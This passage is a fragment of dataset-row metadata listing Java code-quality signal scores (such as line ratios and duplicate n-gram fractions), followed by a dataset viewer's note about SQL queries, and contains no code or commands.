"qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.01369863, "qsc_codejava_score_lines_no_logic": 0.12328767, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.